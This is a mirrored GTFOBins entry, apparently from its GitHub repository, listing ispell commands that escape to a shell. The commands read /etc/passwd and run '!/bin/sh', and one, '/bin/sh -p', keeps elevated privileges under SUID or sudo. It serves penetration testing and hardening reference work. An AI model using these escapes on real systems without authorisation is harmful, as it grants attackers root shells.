mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
50ab4f0ce0
Close #259
16 lines
228 B
Markdown
16 lines
228 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: |
|
|
ispell /etc/passwd
|
|
!/bin/sh
|
|
suid:
|
|
- code: |
|
|
./ispell /etc/passwd
|
|
!/bin/sh -p
|
|
sudo:
|
|
- code: |
|
|
sudo ispell /etc/passwd
|
|
!/bin/sh
|
|
---
|